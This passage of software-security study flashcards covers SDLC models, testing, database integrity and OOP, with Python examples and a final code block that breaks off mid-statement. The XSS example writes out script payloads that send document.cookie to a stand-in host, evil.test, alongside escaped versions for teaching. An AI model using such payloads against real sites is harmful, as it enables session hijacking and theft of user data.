Software Development Lifecycle Flashcards

1
Q

What is the attack surface?

A

The attack surface is the collection of all the points (network services, APIs, input fields, file parsers, privileged interfaces) through which an attacker can interact with, and potentially enter, a system. Reducing this surface reduces the number of ways an attacker can exploit the system, so unused services and interfaces should be removed or disabled rather than merely left unadvertised.

2
Q

What is Computer Aided Software Engineering (CASE)?

A

Computer-aided software engineering refers to any type of software that allows for the automated development of software, which can come in the form of program editors, debuggers, code analyzers, version-control mechanisms, and more. The goals are to increase development speed and productivity and reduce errors.

3
Q

What is fuzzing?

A

Fuzzing is the act of feeding a target program large volumes of malformed, unexpected, or random input in order to trigger failures (crashes, hangs, assertion failures) that point to bugs, very often input-validation or memory-safety bugs.

4
Q

What does ISO/IEC 27034 cover?

A

The ISO/IEC 27034 standard covers the following items: application security overview and concepts, the organization normative framework, the application security management process, protocols and the application security control data structure, case studies, and application security assurance prediction.

5
Q

What is The Open Web Application Security Project (OWASP)?

A

The Open Web Application Security Project (OWASP), renamed the Open Worldwide Application Security Project in 2023, is a nonprofit organization dedicated to helping the industry develop more secure software. It publishes freely available guidance, testing guides, and tools, including the well-known OWASP Top 10 list of web application security risks.

6
Q

What are the levels of CMMI?

A
The CMMI model uses five maturity levels, numbered 1 through 5. Each level represents the maturity of the organization's process quality and optimization. As commonly listed in CISSP study material, the levels are:
1 = Initial,
2 = Repeatable,
3 = Defined,
4 = Managed,
5 = Optimizing.
Note that these are the level names of the original Software CMM; CMMI itself labels level 2 "Managed" and level 4 "Quantitatively Managed", with the other names unchanged.
7
Q

At what point should change control be implemented?

A

Change control needs to be put in place at the beginning of a project and must be enforced through each phase. Changes must be authorized, tested, and recorded. The changes must not affect the security level of the system or its capability to enforce the security policy.

8
Q

List the different Software Development Lifecycle models.

A

There are several SDLC models. Waterfall is the sequential approach that requires each phase to complete before the next one can begin; the other models (Rapid Application Development, Agile, incremental, prototyping, and the V-model) are described on the following cards.

9
Q

What are the various application testing methods?

A

Unit (testing individual components in a controlled environment, where programmers validate data structure, logic, and boundary conditions),

integration (verifying that components work together as outlined in the design specifications),

acceptance (ensuring the code meets customer requirements),

regression (retesting after changes take place, to confirm functionality, performance, and protection),

static analysis (reviewing program code without executing it), and

dynamic analysis (analyzing the program while it executes).

10
Q

Rapid Application Development (RAD) (SDLC)

A

Rapid Application Development combines prototyping and iterative development procedures with the goal of accelerating the software development process.

11
Q

Agile (SDLC) Model

A

Agile (iterative and incremental development processes that encourage team-based collaboration, and flexibility and adaptability are used instead of a strict process structure).

12
Q

Incremental (SDLC) Model

A

Incremental: multiple development cycles are carried out on a piece of software throughout its development stages, each delivering a working subset of the functionality.

13
Q

Prototyping (SDLC) Model

A

Prototyping (creating a sample of the code for proof-of-concept purposes)

14
Q

V-Model (SDLC) Model

A

V-model (emphasizes verification and validation at each phase)

15
Q

What is Software Configuration Management (SCM)?

A

Software configuration management (SCM) is the task of tracking and controlling changes in the software through the use of authentication, revision control, the establishment of baselines, and auditing. It has the purpose of maintaining software integrity and traceability throughout the software development life cycle.

16
Q

What is Generation 1 programming Language?

A

Programming languages have gone through evolutionary processes.
Generation one is machine language (binary format).

17
Q

What is Generation 2 programming Language?

A

Generation two is assembly language (which is translated by an assembler into machine code).

18
Q

What is Generation 3 programming Language?

A

Generation three is high-level language (which provides a level of abstraction).

19
Q

What is Generation 4 programming Language?

A

Generation four is a very high-level language (which provides more programming abstraction).

20
Q

What is Generation 5 Programming language?

A

Generation five is natural language (which is used for artificial intelligence purposes).

21
Q

What is data modeling?

A

Data modeling is a process used to define and analyze data requirements needed to support the business processes within the scope of corresponding systems and software applications.

22
Q

What features does object-oriented programming provide?

A

Object-oriented programming provides modularity, reusability, and more granular control within the programs themselves compared to classical programming languages.

23
Q

Describe the role of Objects in Object Oriented Programming?

A

Objects are members, or instances, of classes. The classes dictate the objects’ data types, structure, and acceptable actions.

24
Q

How do objects in OOP communicate?

A

In OOP, objects communicate with each other through messages, and a method is functionality that an object can carry out. Objects can communicate properly because they use standard interfaces.

25
Q

Define Polymorphism?

A

Polymorphism is when different objects receive the same message (the same method call or input) and respond differently, each according to the behaviour defined by its own class.

26
Q

Describe the internal operations of objects?

A

Data and operations internal to objects are hidden from other objects, which is referred to as data hiding. Each object encapsulates its data and processes.

27
Q

Describe the characteristics of object-oriented design.

A

Object-oriented design represents a real-world problem and modularizes the problem into cooperating objects that work together to solve the problem.

28
Q

What is Coupling?

A

Coupling is a measure of how much a module depends on, and interacts with, other modules. If an object does not require much interaction with other modules, it has low coupling; a change to one module is then less likely to break another, and the module is easier to test and to reason about in isolation.

29
Q

What’s the best programming design?

A

The best programming design enables objects to be as independent and as modular as possible; therefore, the higher the cohesion and the lower the coupling, the better.

30
Q

What is an Object Request Broker (ORB)?

A

An object request broker (ORB) manages communications between objects and enables them to interact in a heterogeneous and distributed environment.

31
Q

What is the Common Object Request Broker Architecture (CORBA)?

A

Common Object Request Broker Architecture (CORBA) provides a standardized way for objects within different applications, platforms, and environments to communicate. It accomplishes this by providing standards for interfaces between objects.

32
Q

What is a Component Object Model (COM)?

A

Component Object Model (COM) provides an architecture for components to interact on a local system.

33
Q

What is a Distributed Component Object Model (DCOM)?

A

Distributed COM (DCOM) uses the same interfaces as COM, but enables components to interact over a distributed, or networked, environment.

34
Q

What is Open Database Connectivity (ODBC)?

A

Open Database Connectivity (ODBC) enables several different applications to communicate with several different types of databases by calling the required driver and passing data through that driver.

35
Q

What is Object linking and embedding?

A

Object linking and embedding (OLE) enables a program to call another program (linking) and permits a piece of data to be inserted inside another program or document (embedding).

36
Q

Define Service oriented architecture (SOA)?

A

Service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. Service interactions are self-contained and loosely coupled so that each interaction is independent of any other interaction.

37
Q

What are security features of Java programming language?

A

Java's security model runs untrusted code such as applets in a sandbox, so the applet is restricted from accessing the user's hard drive or other system resources. Over the years many sandbox escapes were found, so the restriction could not be relied upon on its own. The applet model is now obsolete: the Applet API was deprecated in Java 9 and the browser plugin was removed in Java 11.

38
Q

What is SOAP?

A

SOAP is an XML-based messaging protocol that allows programs created with different programming languages and running on different operating systems to exchange structured messages without compatibility issues.

39
Q

What are the 3 main types of Cross-Site Scripting (XSS)?

A
There are three main types of cross-site scripting (XSS) attacks:
nonpersistent, or reflected, XSS (exploiting the lack of proper input or output validation on dynamic websites, so that script carried in a crafted request is echoed back to the user who sent it),
persistent, or stored, XSS (the attacker loads malicious code onto the server, which then serves it to every visiting browser), and
DOM-based XSS (the attacker uses the DOM environment to modify the behaviour of the original client-side JavaScript, without the payload necessarily passing through the server).

40
Q

Define Database management System?

A

A database management system (DBMS) is the software that controls the access restrictions, data integrity, redundancy, and the different types of manipulation available for a database.

41
Q

What is the database Primary Key?

A

A primary key is the column, or set of columns, whose value uniquely identifies a specific row in a table of a relational database. Other tables refer to that row by storing its primary key value as a foreign key.

42
Q

What is the purpose of a DB View?

A

A view is an access control mechanism used in databases to ensure that only authorized subjects can access sensitive information.

A database view is put into place to prevent certain users from viewing specific data. This is a preventive measure, because the administrator is preventing the users from seeing data not meant for them. This is one control to prevent inference attacks.

43
Q

How is a relational database structured?

A

A relational database uses two-dimensional tables with rows (tuples) and columns (attributes).

44
Q

What is a hierarchical database?

A

A hierarchical database uses a tree-like structure to define relationships between data elements: each record has one parent and possibly many children, which suits one-to-many relationships but makes many-to-many relationships awkward to represent.

45
Q

What is a data definition language (DDL)?

A

Defines the structure and schema of the database. The structure could mean the table size, key placement, views, and data element relationship. The schema describes the type of data that will be held and manipulated, and their properties. It defines the structure of the database, access operations, and integrity procedures.

46
Q

What is Data Manipulation Language (DML)?

A

Contains all the commands that enable a user to view, manipulate, and use the database (view, add, modify, sort, and delete).

47
Q

What is Query Language?

A

Enables users to make requests of the database.

48
Q

What is a report generator?

A

Produces printouts of data in a user-defined manner.

49
Q

What’s the purpose of a commit statement in a database?

A

A commit statement saves all changes to the database.

50
Q

What is the purpose of a checkpoint in transaction?

A

A checkpoint records a known-good state during a transaction. If there is a system failure or problem during the transaction, the database is returned (rolled back) to the state of the last checkpoint instead of being left partially modified.

51
Q

When does Aggregation occur?

A

Aggregation can happen if a user does not have access to a group of elements, but has access to some of the individual elements within the group. Aggregation happens if the user combines the information of these individual elements and figures out the information of the group of data elements, which is at a higher sensitivity level.

52
Q

What is Inference?

A

Inference is the capability to derive information that is not explicitly available.

53
Q

What are attempts to prevent Inference attacks?

A

Common attempts to prevent inference attacks are partitioning the database, cell suppression, and adding noise to the database.

54
Q

What is Polyinstantiation?

A

Polyinstantiation is the process of allowing a table to have multiple rows with the same primary key. The different instances can be distinguished by their security levels or classifications.

55
Q

Define Data Warehousing?

A

Data warehousing combines data from multiple databases and data sources.

56
Q

What is Data Mining?

A

Data mining is the process of searching, filtering, and associating data held within a data warehouse to provide more useful information to users.

57
Q

What is a Polymorphic Virus?

A

A polymorphic virus tries to escape signature-based detection by making copies of itself and modifying the code and attributes of those copies, so that each infection looks different to a scanner that compares files against fixed byte patterns.

58
Q

What is a Logic Bomb?

A

A logic bomb executes a program when a predefined event takes place, or a date and time are met.

59
Q

Describe a Trojan Horse?

A

A Trojan horse is a program that performs useful functionality apparent to the user while also carrying out malicious functionality without the user's knowledge.

60
Q

When is Anti-malware Software most effective?

A

Antimalware software is most effective when it is installed at every entry point and endpoint and is backed by a policy that covers user training as well as software configuration and updating.

61
Q

What is DevOps?

A

DevOps is a type of integrated product team (IPT) that focuses on three communities: software development, IT operations, and quality assurance. The idea is to reduce the friction that oftentimes exists between the developers and IT staff in order to improve quality and velocity.

62
Q

What is the difference between Instantiation and Polyinstantiation?

A

Instantiation is what happens when an object is created from a class.

Polyinstantiation is when more than one object is instantiated from the same class (or, in a database, more than one row carries the same primary key) and the copies are given different attributes. This can be done for several reasons.

In security, polyinstantiation is used so that a lower-level subject cannot access, or even infer the existence of, an object at a higher level: the lower-level subject is shown its own instance instead.

63
Q

What is the meaning of Partitioning?

A

Partitioning means to logically split the database into parts.

64
Q

what does Cell suppression mean?

A

Cell suppression means that specific cells in a DB are not viewable by certain users.

65
Q

What is the purpose of noise and perturbation in a DB?

A

Noise and perturbation is a technique in which bogus information is inserted into the database so that attackers attempting inference draw incorrect conclusions, while legitimate statistical results remain approximately correct.
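
The row filtering, cell suppression, and polyinstantiation described on cards 42, 54, 63 and 64 can all be built from one table and a set of views. The following is an added example written for this page (it is not from the original flashcards or from any named product); the `flights` and `levels` tables, the constructed rows, and the names `flights_for` and `write_instance` are this example's own. It uses Python's built-in sqlite3, which has no GRANT statement, so the "grant access to the view, not the table" step that a production DBMS would add is described in the comments rather than executed.

```python
import sqlite3

LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2}

SCHEMA = """
CREATE TABLE levels (classification TEXT PRIMARY KEY, lvl INTEGER NOT NULL);
INSERT INTO levels VALUES ('unclassified', 0), ('confidential', 1), ('secret', 2);

CREATE TABLE flights (
    flight_no      TEXT NOT NULL,
    classification TEXT NOT NULL REFERENCES levels(classification),
    destination    TEXT NOT NULL,
    cargo          TEXT,
    PRIMARY KEY (flight_no, classification)   -- polyinstantiation: one flight_no, one row per level
);
-- Constructed rows. For AF101 the 'secret' row is the truth and the 'unclassified' row is the cover story.
INSERT INTO flights VALUES ('AF101', 'unclassified', 'Lisbon',  'mail');
INSERT INTO flights VALUES ('AF101', 'secret',       'Tripoli', 'munitions');
INSERT INTO flights VALUES ('AF202', 'confidential', 'Oslo',    'spares');
"""

# One view per clearance. In a real DBMS each subject is granted SELECT on its view only,
# never on the base table. {lvl} is filled from the LEVELS constant, not from user input.
VIEW_TEMPLATE = """
CREATE VIEW flights_{name} AS
WITH visible AS (
    SELECT f.flight_no, f.classification, f.destination, f.cargo, l.lvl
    FROM flights f JOIN levels l ON l.classification = f.classification
    WHERE l.lvl <= {lvl}                                              -- row filtering by clearance
),
top AS (
    SELECT flight_no, MAX(lvl) AS lvl FROM visible GROUP BY flight_no  -- highest instance the subject may see
)
SELECT v.flight_no, v.classification, v.destination,
       CASE WHEN {lvl} >= 1 THEN v.cargo ELSE NULL END AS cargo        -- cell suppression of the cargo column
FROM visible v JOIN top t ON t.flight_no = v.flight_no AND t.lvl = v.lvl
ORDER BY v.flight_no;
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for name, lvl in LEVELS.items():
        conn.executescript(VIEW_TEMPLATE.format(name=name, lvl=lvl))
    return conn


def flights_for(conn: sqlite3.Connection, clearance: str) -> list:
    """Rows as seen through the view that matches the subject's clearance."""
    if clearance not in LEVELS:                  # allow-list before the name is used in SQL text
        raise ValueError(f"unknown clearance {clearance!r}")
    return conn.execute(f"SELECT * FROM flights_{clearance}").fetchall()


def write_instance(conn, flight_no, classification, destination, cargo) -> None:
    """A high-clearance write adds a new instance instead of overwriting the low one, so the
    view of lower-cleared subjects does not change (a change would itself leak information)."""
    with conn:
        conn.execute("INSERT INTO flights VALUES (?, ?, ?, ?)",
                     (flight_no, classification, destination, cargo))


def instance_count(conn, flight_no) -> int:
    return conn.execute("SELECT count(*) FROM flights WHERE flight_no = ?",
                        (flight_no,)).fetchone()[0]


if __name__ == "__main__":
    db = open_db()
    for level in LEVELS:
        print(level, flights_for(db, level))
    write_instance(db, "AF202", "secret", "Murmansk", "radar")
    print("confidential after secret write:", flights_for(db, "confidential"))
    print("secret after secret write:      ", flights_for(db, "secret"))
```

The unclassified view returns AF101 bound for Lisbon with the cargo column blanked; the secret view returns the Tripoli instance of the same flight number. After the secret write to AF202, the confidential view is byte-for-byte unchanged, which is the whole point of keeping two instances rather than updating one row.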

66
Q

What are the components of ACID test?

A

  • Atomicity - Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back.
  • Consistency - A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases.
  • Isolation - Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed.
  • Durability - Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.
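
The four ACID properties, together with the commit and checkpoint behaviour on cards 49 and 50, can be observed directly with a small transactional script. The following is an added example (not part of the original flashcards) using Python's built-in sqlite3 on a temporary file; the `accounts` table, its two sample rows, and the names `transfer`, `batch_with_savepoints` and `demo` are this example's own. One caveat on terminology: the flashcard's "checkpoint" inside a transaction corresponds to the SQL SAVEPOINT statement used here; SQLite also has an unrelated "checkpoint" operation for its write-ahead log.

```python
import os
import sqlite3
import tempfile

SCHEMA = """
CREATE TABLE accounts (
    id      INTEGER PRIMARY KEY,
    owner   TEXT NOT NULL,
    balance INTEGER NOT NULL CHECK (balance >= 0)   -- consistency rule: no account may go negative
);
INSERT INTO accounts VALUES (1, 'alice', 100), (2, 'bob', 20);   -- constructed sample data
"""


def open_db(path: str) -> sqlite3.Connection:
    # isolation_level=None: no implicit transactions, so BEGIN/COMMIT/ROLLBACK below are explicit
    return sqlite3.connect(path, isolation_level=None)


def balances(conn: sqlite3.Connection) -> dict:
    cur = conn.execute("SELECT owner, balance FROM accounts ORDER BY id")
    rows = cur.fetchall()
    cur.close()                                     # release the read lock promptly
    return dict(rows)


def transfer(conn, src: int, dst: int, amount: int) -> bool:
    """Atomicity: both updates commit together, or the whole transfer is rolled back."""
    conn.execute("BEGIN")
    try:
        conn.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", (amount, src))
        conn.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", (amount, dst))
        conn.execute("COMMIT")
        return True
    except sqlite3.IntegrityError:                  # CHECK violation: overdraft
        conn.execute("ROLLBACK")
        return False


def batch_with_savepoints(conn, ops) -> list:
    """Many transfers in one transaction. A failing step is rolled back to its own savepoint
    (the flashcard's 'checkpoint') without discarding the steps that succeeded before it."""
    outcomes = []
    conn.execute("BEGIN")
    for i, (src, dst, amount) in enumerate(ops):
        conn.execute(f"SAVEPOINT step{i}")
        try:
            conn.execute("UPDATE accounts SET balance = balance - ? WHERE id = ?", (amount, src))
            conn.execute("UPDATE accounts SET balance = balance + ? WHERE id = ?", (amount, dst))
            outcomes.append(True)
        except sqlite3.IntegrityError:
            conn.execute(f"ROLLBACK TO step{i}")
            outcomes.append(False)
        conn.execute(f"RELEASE step{i}")
    conn.execute("COMMIT")
    return outcomes


def demo(path: str = None) -> dict:
    """Run the whole scenario on a file-backed database and return what was observed."""
    path = path or os.path.join(tempfile.mkdtemp(), "bank.db")
    a = open_db(path)
    a.executescript(SCHEMA)
    seen = {}
    seen["overdraft_committed"] = transfer(a, 1, 2, 150)          # False: alice only has 100
    seen["after_failed"] = balances(a)                             # unchanged: atomicity
    seen["batch"] = batch_with_savepoints(a, [(1, 2, 30), (2, 1, 500), (1, 2, 10)])
    seen["after_batch"] = balances(a)                              # step 2 undone, steps 1 and 3 kept
    # Isolation: a second connection cannot see a's uncommitted update
    b = open_db(path)
    a.execute("BEGIN")
    a.execute("UPDATE accounts SET balance = balance + 1000 WHERE id = 1")
    seen["b_sees_during"] = balances(b)["alice"]
    a.execute("COMMIT")
    seen["b_sees_after"] = balances(b)["alice"]
    a.close()
    b.close()
    # Durability: the committed state survives closing every connection
    c = open_db(path)
    seen["after_reopen"] = balances(c)["alice"]
    c.close()
    return seen


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:20} {value}")
```

The overdraft attempt is rejected by the CHECK constraint on the first UPDATE, and the ROLLBACK leaves both balances exactly as they were. In the batch, only the middle transfer fails and only it is undone. Connection b reads the old balance while a's transaction is open and the new one immediately after COMMIT, and the value is still there when the file is reopened.
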
67
Q

What are the phases of the Software Development Lifecycle?

A
  1. Requirements gathering
  2. Design
  3. Development
  4. Testing/ Validation
  5. Release/ Maintenance
68
Q

What is Software Unit Testing?

A

Unit testing: testing individual components in a controlled environment, where programmers validate data structure, logic, and boundary conditions.

69
Q

What is Software Integration Testing?

A

Integration testing: verifying that components work together as outlined in the design specifications.

70
Q

What is Software Acceptance Testing?

A

Acceptance testing: ensuring that the code meets customer requirements.

71
Q

What is software Regression Testing?

A

Regression testing: after a change to a system takes place, retesting to ensure functionality, performance, and protection.

72
Q

What is Garbage Collection?

A

Garbage collection is an automated way for software to carry out part of its memory management tasks.

A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks.

It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

73
Q

What is Joint Analysis Development (JAD) ?

A

Joint Analysis Development (JAD) is a method that uses a team approach to application development in a workshop-oriented environment.

74
Q

What is the Reuse Model?

A

Reuse model is a model that approaches software development by using progressively developed models. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse model does not require programs to be built from scratch, it drastically reduces both development cost and time.

75
Q

What is the Cleanroom approach?

A

Cleanroom - An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

76
Q

What is Fuzz testing?

A

Fuzz testing or fuzzing is a software testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.
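
As an added example, not part of the original flashcards and not taken from any real fuzzer, the following Python script shows the loop that cards 3 and 76 describe: start from a few valid inputs, mutate them, feed them to the target, and record every failure that is not a deliberate rejection. The target, `parse_records`, is a small type-length-value parser constructed for this example with three planted bugs; `SEEDS`, `mutate` and `fuzz` are likewise this example's own names.

```python
import random
import struct


class ParseError(Exception):
    """Graceful rejection of malformed input. This is the parser doing its job, not a bug."""


def parse_records(blob: bytes) -> list:
    """Parse a byte string of type-length-value records.

    Layout of one record: 1-byte type, 2-byte big-endian length, then `length` bytes.
    Constructed for this example; it contains three deliberate bugs for the fuzzer to find.
    """
    records = []
    pos = 0
    while pos < len(blob):
        if pos + 3 > len(blob):
            raise ParseError("truncated header")
        rtype = blob[pos]
        (length,) = struct.unpack_from(">H", blob, pos + 1)
        value = blob[pos + 3:pos + 3 + length]
        if len(value) != length:
            raise ParseError("truncated value")
        if rtype == 0x01:                                    # text record
            records.append(("text", value.decode("ascii")))  # bug 1: non-ASCII -> UnicodeDecodeError
        elif rtype == 0x02:                                  # ratio record: numerator, denominator
            if length != 2:
                raise ParseError("ratio record needs exactly 2 bytes")
            records.append(("ratio", value[0] // value[1]))  # bug 2: denominator 0 -> ZeroDivisionError
        elif rtype == 0x03:                                  # checksummed blob: last byte = sum of the rest
            body, check = value[:-1], value[-1]              # bug 3: length 0 -> IndexError
            if sum(body) % 256 != check:
                raise ParseError("bad checksum")
            records.append(("blob", body))
        else:
            raise ParseError(f"unknown record type {rtype:#04x}")
        pos += 3 + length
    return records


def record(rtype: int, value: bytes) -> bytes:
    """Build one well-formed record (used for the seed corpus)."""
    return bytes([rtype]) + struct.pack(">H", len(value)) + value


# Seed corpus: valid inputs the mutator starts from (constructed for this example)
SEEDS = [
    record(0x01, b"hello"),
    record(0x02, bytes([10, 3])),
    record(0x03, b"\x01\x02\x03" + bytes([6])),
    record(0x01, b"ab") + record(0x02, bytes([9, 9])),
]

INTERESTING = [0x00, 0x01, 0x7F, 0x80, 0xFF]   # boundary values that often expose off-by-one bugs


def mutate(data: bytes, rng: random.Random) -> bytes:
    """Apply 1-3 random byte-level mutations to a seed."""
    buf = bytearray(data)
    for _ in range(rng.randint(1, 3)):
        op = rng.randrange(5)
        if op == 0 and buf:                                   # flip one bit
            i = rng.randrange(len(buf))
            buf[i] ^= 1 << rng.randrange(8)
        elif op == 1 and buf:                                 # overwrite a byte with an interesting value
            buf[rng.randrange(len(buf))] = rng.choice(INTERESTING)
        elif op == 2:                                         # insert a random byte
            buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
        elif op == 3 and buf:                                 # delete a byte
            del buf[rng.randrange(len(buf))]
        elif op == 4 and buf:                                 # truncate
            del buf[rng.randrange(len(buf)):]
    return bytes(buf)


def fuzz(iterations: int = 20000, seed: int = 1) -> dict:
    """Mutational fuzzing loop. Returns {(exception name, message): first input that triggered it}.

    ParseError is the parser rejecting bad input cleanly, so it is ignored; any other
    exception escaping the parser is an unhandled failure and is recorded as a crash.
    """
    rng = random.Random(seed)
    crashes = {}
    for _ in range(iterations):
        candidate = mutate(rng.choice(SEEDS), rng)
        try:
            parse_records(candidate)
        except ParseError:
            continue
        except Exception as exc:
            key = (type(exc).__name__, str(exc)[:60])
            crashes.setdefault(key, candidate)
    return crashes


if __name__ == "__main__":
    for (name, msg), trigger in fuzz().items():
        print(f"{name:20} {msg:60} triggered by {trigger.hex()}")
```

The split between `ParseError` and every other exception is the design point worth copying: a fuzzer needs a way to tell "rejected cleanly" from "crashed", otherwise every malformed input looks like a finding. Real fuzzers such as AFL++ and libFuzzer add coverage feedback so that inputs reaching new code are kept as new seeds; this script has no such feedback and relies on volume, which is enough for a parser this small.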

77
Q

What are the characteristics of object-oriented programming, and what is meant by deferred commitment?

A

  • Modularity: autonomous objects that cooperate through exchanges of messages.
  • Deferred commitment: the internal components of an object can be redefined without changing other parts of the system.
  • Reusability: refining classes through inheritance, and other programs using the same objects.
  • Naturalness: object-oriented analysis, design, and modeling map to business needs and solutions.
78
Q

Describe Buffer Overflow

A

The buffer overflow is probably the most notorious of input validation mistakes. A buffer is an area of memory reserved by an application to store something, such as user input. When the buffer lives on the stack, it sits near the saved return address, the value the CPU loads into the instruction pointer when the current function returns.

A buffer overflow occurs when an application erroneously allows more input to be written into the buffer than it was sized for, so the excess overwrites adjacent memory, including that saved return address. Once the return address has been replaced with a value the attacker chose, execution can be redirected to whatever code the attacker placed in the buffer (or elsewhere in memory), all under the security context of the application. Modern mitigations such as stack canaries, non-executable stacks (DEP/NX), and ASLR make exploitation harder but do not remove the underlying bug; the fix is bounds checking of every write.

80
Q

What is the non-persistent cross-site scripting vulnerability?

A

The non-persistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response.

The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on “normal” pages returned to other users in the course of regular browsing without proper HTML escaping.

DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.
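
The reflected and stored variants on cards 39 and 80 differ only in where the attacker's string sits before it reaches the victim's browser; the server-side mistake, and the fix, are the same. The following is an added example written for this page (not from the original flashcards or from any real application) that renders the same two pages once unescaped and once through Python's `html.escape`. The attacker link, the comment store, and the function names are this example's own. The DOM-based variant runs entirely in browser JavaScript and is not shown here.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link. A victim who clicks it sends the payload in the q parameter,
# and a server that echoes q unescaped reflects the script back into the victim's page.
ATTACK_URL = (
    "https://example.test/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.test%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Read one query parameter the way a server-side handler would (already percent-decoded)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(q: str) -> str:
    """Reflected (nonpersistent) XSS: the parameter goes straight into the HTML response."""
    return f"<h1>Results for: {q}</h1>"


def render_search_safe(q: str) -> str:
    """Same page with output encoding for an HTML element or quoted-attribute context."""
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"


# Constructed comment store. The second comment was submitted by an attacker and is served
# to every later visitor: that is the persistent (stored) variant.
COMMENTS = [
    {"user": "alice", "body": "Nice article"},
    {"user": "mallory",
     "body": '<img src=x onerror="fetch(\'https://evil.test/?c=\'+document.cookie)">'},
]


def render_comments_vulnerable(comments) -> str:
    return "\n".join(f"<li><b>{c['user']}</b>: {c['body']}</li>" for c in comments)


def render_comments_safe(comments) -> str:
    return "\n".join(
        f"<li><b>{html.escape(c['user'])}</b>: {html.escape(c['body'])}</li>" for c in comments
    )


def survives_unescaped(rendered: str, untrusted: str) -> bool:
    """Demo check: did untrusted input containing HTML metacharacters reach the page verbatim?"""
    return untrusted != html.escape(untrusted, quote=True) and untrusted in rendered


if __name__ == "__main__":
    q = query_param(ATTACK_URL, "q")
    print("reflected, vulnerable:", render_search_vulnerable(q))
    print("reflected, escaped:   ", render_search_safe(q))
    print("stored, vulnerable:\n" + render_comments_vulnerable(COMMENTS))
    print("stored, escaped:\n" + render_comments_safe(COMMENTS))
```

`html.escape` is the right encoder only for text placed inside an HTML element or a quoted attribute. A value inserted into a `<script>` block, a URL, or CSS needs the encoder for that context, which is why template engines with context-aware auto-escaping are preferred over hand-applied escaping.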

81
Q

What are the characteristics of ADO?

A

The following are correct characteristics of ADO:

  • It’s a high-level data access programming interface to an underlying data access technology (such as OLE DB).
  • It’s a set of COM objects for accessing data sources, not just database access.
  • It allows a developer to write programs that access data without knowing how the database is implemented.
  • SQL commands are not required to access a database when using ADO.
82
Q

What is Semantic Integrity mechanism?

A

A semantic integrity mechanism makes sure structural and semantic rules are enforced. These rules pertain to data types, logical values, uniqueness constraints, and operations that could adversely affect the structure of the database.

83
Q

What is referential integrity?

A

A database has referential integrity if all foreign keys reference existing primary keys. There should be a mechanism in place that ensures no foreign key contains a reference to a primary key of a nonexistent record, or a null value.

84
Q

What is Entity integrity?

A

Entity integrity guarantees that the tuples are uniquely identified by primary key values. For the sake of entity integrity, every tuple must contain one primary key. If it does not have a primary key, it cannot be referenced by the database.
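
The three integrity rules on cards 82, 83 and 84 are enforced by the DBMS only if the schema declares them, and some engines add a further switch. The following is an added example written for this page (not from the original flashcards) using Python's built-in sqlite3: the `departments` and `employees` tables, their sample rows, and the names `attempt` and `run_checks` are this example's own. It exercises each rule and collects the engine's rejection message, so the behaviour can be seen rather than assumed.

```python
import sqlite3

SCHEMA = """
CREATE TABLE departments (
    dept_id INTEGER PRIMARY KEY,                 -- entity integrity: non-null, unique row identifier
    name    TEXT NOT NULL UNIQUE
);
CREATE TABLE employees (
    emp_id  INTEGER PRIMARY KEY,
    name    TEXT NOT NULL,
    salary  INTEGER NOT NULL CHECK (salary > 0), -- semantic integrity: a business rule on the value
    dept_id INTEGER NOT NULL                     -- referential integrity: must point at a real department
            REFERENCES departments(dept_id) ON DELETE RESTRICT
);
INSERT INTO departments VALUES (10, 'engineering'), (20, 'finance');   -- constructed sample data
INSERT INTO employees   VALUES (1, 'alice', 120000, 10);
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite silently ignores REFERENCES clauses unless this pragma is set on every connection.
    conn.execute("PRAGMA foreign_keys = ON")
    conn.executescript(SCHEMA)
    return conn


def attempt(conn: sqlite3.Connection, sql: str) -> str:
    """Run one statement in its own transaction; return 'ok' or the violated constraint."""
    try:
        with conn:
            conn.execute(sql)
        return "ok"
    except sqlite3.IntegrityError as exc:
        return str(exc)


def run_checks(conn=None) -> dict:
    """Exercise each integrity rule; every key maps to 'ok' or the DBMS's rejection message."""
    conn = conn or open_db()
    results = {
        "dangling_fk":       attempt(conn, "INSERT INTO employees VALUES (2, 'bob', 90000, 99)"),
        "null_fk":           attempt(conn, "INSERT INTO employees VALUES (3, 'carol', 90000, NULL)"),
        "duplicate_pk":      attempt(conn, "INSERT INTO departments VALUES (10, 'sales')"),
        "negative_salary":   attempt(conn, "INSERT INTO employees VALUES (4, 'dan', -5, 10)"),
        "delete_referenced": attempt(conn, "DELETE FROM departments WHERE dept_id = 10"),
        "valid_insert":      attempt(conn, "INSERT INTO employees VALUES (5, 'eve', 80000, 20)"),
    }
    # Independent audit of referential integrity: no employee row points at a missing department
    results["orphan_rows"] = conn.execute(
        "SELECT count(*) FROM employees e LEFT JOIN departments d ON d.dept_id = e.dept_id "
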